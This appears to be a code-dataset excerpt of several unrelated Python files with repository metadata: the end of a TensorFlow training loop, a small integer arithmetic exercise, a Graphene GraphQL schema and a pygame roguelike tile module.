, variable_restore_op, gpu_memory_fraction = FLAGS.memory_fraction)
fetch = Fetch()
fetch.add(list(loss_list), "loss")
fetch.add([model_outputs[1]], "pred")
fetch.add([train_op, summary_op], "trainop")
max_epochs = TRAIN_PARAMETERS['max_epochs']
if RESTORE_PARAMETERS['restore']:
ckpt_path = tf.train.latest_checkpoint(TRAIN_PARAMETERS['ckpt_path'])
restore_epoch = int(ckpt_path.split('.')[-2].split('_')[-1])
else:
restore_epoch = 0
print_each_epoch = TRAIN_PARAMETERS['print_each_epoch']
decay_epoch = TRAIN_PARAMETERS['decay_epoch']
decay_learning_rate = TRAIN_PARAMETERS['learning_rate']
decay_point = 1
for _ in decay_epoch:
if restore_epoch >= _:
decay_point += 1
save_epochs = TRAIN_PARAMETERS['save_epochs']
train_dataset = data_loader.load_train_dataset(max_epochs + warmup_epoch - restore_epoch, preload_train_dataset, ROOT_CFG, AUGMENT_PARAMETERS)
train_data = next(train_dataset)
for warm_up_step in range(warmup_epoch):
LR = sess.run(learning_rate)
print("---------warmup[{}/{} LR:{:.6f}]--------".format(warm_up_step+1, warmup_epoch, LR))
warmupBar = progress_bar.ProgressBar(50, train_data_size)
warmup_index = 0
while train_data != 0:
batch_num = len(train_data[1])
fetch_real_value = sess.run(fetch.fetchlist,
feed_dict={prepare_data[0]: train_data[0],
prepare_data[2]: train_data[1],
prepare_data[1]: True})
warmup_index += batch_num
warmupBar.print(warmup_index)
train_data = next(train_dataset)
train_data = next(train_dataset)
sess.run(tf.assign(learning_rate, LR + warmup_ratios))
if not RESTORE_PARAMETERS['restore']:
# lr_init = RESTORE_PARAMETERS['learning_rate']
sess.run(tf.assign(learning_rate, lr_init))
epochRecorder = EpochRecorder(print_loss_dict, summary_writer, restore_epoch, max_epochs)
start = time.time()
step = restore_step
for epoch in range(restore_epoch + 1, max_epochs + 1):
train_err = np.zeros((2), dtype=np.int32)
mean_loss = np.zeros((len(print_loss_dict)), dtype=np.float32)
steps_per_epoch = 0
now_batch_nums = 0
epochRecorder.start_epoch()
LR = sess.run(learning_rate)
while train_data != 0:
batch_num = len(train_data[1])
fetch_real_value = sess.run(fetch.fetchlist,
feed_dict={prepare_data[0]: train_data[0],
prepare_data[2]: train_data[1],
prepare_data[1]: True})
prediction = fetch.get(fetch_real_value, "pred")[0]
pred_label = np.argmax(prediction, axis=1)
train_err[0] += np.sum(pred_label == train_data[1])
train_err[1] += float(batch_num)
mean_loss = mean_loss + fetch.get(fetch_real_value, "loss")[print_loss_index[0]:print_loss_index[1]]
step = step + 1
steps_per_epoch = steps_per_epoch + 1
now_batch_nums += batch_num
summary_str = fetch.get(fetch_real_value, "trainop")[-1]
summary_writer.add_summary(summary_str, global_step=step)
if print_each_epoch is not None and steps_per_epoch % print_each_epoch == 0:
total_time = time.time() - start
avg_time_per_step = total_time / print_each_epoch
start = time.time()
print_loss_value = mean_loss / steps_per_epoch
print('Epoch[{}/{}] Data[{}/{}]'.format(epoch-1, max_epochs, now_batch_nums, train_data_size), end='')
# ap_dict, total_ap, info_dict, pr_dict = eval_map.calmAP()
# print(',map{:.2f}'.format(100 * total_ap), end='')
tmp_err = eval_tools.top_error(train_err)
print(',err:{:.2f}'.format(tmp_err), end='')
for name, value in zip(print_loss_dict, print_loss_value):
print(', {} {:.4f}'.format(name, value), end='')
rest_time = total_time * (train_data_size - now_batch_nums) / batch_num / print_each_epoch
print(', {:.2f} seconds, remain {:.2f} seconds, LR {:.6f}'.format(total_time, rest_time, LR))
train_data = next(train_dataset)
# record train condition
# ap_dict, total_ap, info_dict, pr_dict = eval_map.calmAP()
# epochRecorder.summary_epoch(mean_loss, 100 * total_ap, LR, epoch, step, steps_per_epoch, 'train')
epochRecorder.summary_epoch(mean_loss, train_err, LR, epoch, step, steps_per_epoch, 'train')
train_data = next(train_dataset)
if epoch in decay_epoch:
sess.run(tf.assign(learning_rate, decay_learning_rate[decay_point]))
decay_point = decay_point + 1
if save_epochs[0] < 0:
save_epoch = -save_epochs[0]
if epoch % save_epoch == 0:
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_{:d}'.format(epoch) + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
else:
if epoch in save_epochs:
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_{:d}'.format(epoch) + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_last' + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
sess.close()
if __name__ == '__main__':
tf.app.run()
# real_grad = fetch_real_value[0:len(grads)]
# while True:
# key = input("input:")
# if key == "exit":
# break
# else:
# g_var = []
# n_var = []
# p_var = []
# for i, name in enumerate(grad_name):
# if key in name:
# print(name)
# g_var.append(real_grad[i])
# n_var.append(name)
# p_var.append(grad_real[i])
# p_var = sess.run(p_var)
# while True:
# key = input("query:")
# if key == "q":
# break
# if key == "p":
# for i, v in enumerate(n_var):
# print(n_var[i])
# else:
# for i, name in enumerate(n_var):
# if key in name:
# print("{}".format(name))
# info(g_var[i])
# info(p_var[i])
# real_var = sess.run(p_var)
# exit() | [
"784980667@qq.com"
] | 784980667@qq.com |
7c65675d6822a7edaf6bb50bacade930252936a7 | 6e3b8a04a074c30cf4fc43abe7a208f772df795b | /Data Types and Variables - Exercise/Task1.py | c017814f490a499fbf7b164e9cedce6713f5cc9e | [] | no_license | majurski/Softuni_Fundamentals | dc0808fdaab942896eebfb208fb6b291df797752 | bf53a9efdcb45eb911624ab86d762a6281391fb8 | refs/heads/master | 2022-11-29T06:06:06.287984 | 2020-08-10T19:36:18 | 2020-08-10T19:36:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | a = int(input())
b = int(input())
c = int(input())
d = int(input())
sum = a + b
division = int(sum / c)
ends = division * d
print(ends) | [
"noreply@github.com"
] | majurski.noreply@github.com |
67f23f3e642558e2d11c4b9f83270551732d5387 | 075d4fdc9a10121e93ab33c1c3bafda88c4bf337 | /buho/buho/schema.py | 8dae84588adb898841bdc7759271cf33808f1f00 | [] | no_license | Tibiritabara/buho-backend | e8cdf4808a92eb65f53cbeabdeea14b2d811d038 | 841c7329bc4f0e5e1752b49afa11f12d1c83403b | refs/heads/master | 2023-08-05T10:59:59.416720 | 2020-06-24T23:02:30 | 2020-06-24T23:02:30 | 274,785,012 | 0 | 0 | null | 2021-09-22T19:30:07 | 2020-06-24T22:55:02 | Python | UTF-8 | Python | false | false | 335 | py | """
Graphene schema definition
"""
import graphene
import compras.mutations
import compras.queries
class Query(
compras.queries.Query,
graphene.ObjectType,
):
pass
class Mutation(
compras.mutations.Mutation,
graphene.ObjectType
):
pass
schema = graphene.Schema(
query=Query,
mutation=Mutation,
)
| [
"santos.ricardo@bcgplatinion.com"
] | santos.ricardo@bcgplatinion.com |
e67f7e37e6cce0a557a8d702c6bab8d31037acd8 | 5b764b91be0016ee703fca41927b1438487e797b | /pygamerogue/tile.py | eda25d37c3805ae806fde03cb4b3db35b0634853 | [
"BSD-3-Clause"
] | permissive | mikolasan/pyroguelike | b33b7a959144b9b115ae4876da0d620b33a28eb3 | d51b01a566b5edb39792b59d683b4bf827399ba4 | refs/heads/master | 2021-07-23T23:06:28.822059 | 2021-01-11T16:57:58 | 2021-01-11T16:57:58 | 179,420,626 | 0 | 1 | BSD-3-Clause | 2021-07-07T15:32:36 | 2019-04-04T04:20:26 | Python | UTF-8 | Python | false | false | 3,755 | py | import pygame
rogue_size = (48, 48)
def map_to_pixel(x, y):
return x * rogue_size[0], y * rogue_size[1]
class Tile:
def __init__(self, size, map_pos, pos, background_color, border_color, symbol, padding, text_color):
self.size = size
self.pos = {}
if map_pos is not None:
self.update_map_position(map_pos)
else:
self.set_rect_position(pos)
self.background_color = background_color
self.border_color = border_color
self.symbol = symbol
self.text_padding = padding
self.text_color = text_color
self.angle = 0
self.make_image()
def set_rect_position(self, position):
self.pos['x'] = position[0]
self.pos['y'] = position[1]
self.map_pos = (position[0] // rogue_size[0], position[1] // rogue_size[1])
self.update_rect_position()
def update_map_position(self, map_pos):
self.map_pos = map_pos
self.pos['x'], self.pos['y'] = map_to_pixel(map_pos[0], map_pos[1])
def update_rect_position(self):
if hasattr(self, 'rect'):
self.rect.left, self.rect.top = self.pos['x'], self.pos['y']
def make_image(self):
self.font = pygame.font.Font('font.ttf', 40)
self.rendered_symbol = self.font.render(self.symbol, True, self.text_color)
self.original_image = pygame.Surface(self.size)
self.original_image.fill(self.background_color)
self.original_image.blit(self.rendered_symbol, self.text_padding)
self.image = self.original_image
self.rect = self.image.get_rect()
self.update_rect_position()
def update(self, events):
self.update_rect_position()
def draw(self, screen, camera):
screen.blit(self.image, camera.applyrect(self.rect))
wall = {
'background': (44, 61, 81),
'border': (0, 0, 0),
'text': (146, 154, 162),
'symbol': '-',
'padding': [0, 0],
}
TileDB = {
'-': {
**wall,
'symbol': '-',
},
'|': {
**wall,
'symbol': '|',
},
'<': {
**wall,
'symbol': '<',
},
'.': {
'background': (113, 118, 138),
'border': (0, 0, 0),
'text': (226, 199, 192),
'symbol': '.',
'padding': [0, 0],
},
'@': {
'background': (44, 44, 44),
'border': (50, 100, 0),
'text': (91, 198, 208),
'symbol': '@',
'padding': [0, 0],
},
'!': {
'background': (208, 221, 240),
'border': (250, 0, 0),
'text': (110, 25, 32),
'symbol': '!',
'padding': [0, 0],
},
'/': {
'background': (92, 102, 15),
'border': (250, 0, 0),
'text': (249, 199, 52),
'symbol': 'a',
'padding': [0, 0],
},
'+': {
'background': (146, 154, 162),
'border': (250, 100, 0),
'text': (44, 61, 81),
'symbol': '+',
'padding': [0, 0],
},
'$': {
'background': (224, 219, 225),
'border': (0, 200, 0),
'text': (96, 106, 53),
'symbol': '$',
'padding': [0, 0],
},
'e': {
'background': (254, 160, 47),
'border': (250, 0, 0),
'text': (222, 102, 0),
'symbol': 'e',
'padding': [0, 0],
},
}
class RogueTile(Tile):
def __init__(self, map_pos, tile_id):
preset = TileDB[tile_id]
Tile.__init__(
self,
size=rogue_size,
map_pos=map_pos,
pos=None,
background_color=preset['background'],
border_color=preset['border'],
symbol=preset['symbol'],
padding=preset['padding'],
text_color=preset['text'])
| [
"neupokoev.n@gmail.com"
] | neupokoev.n@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.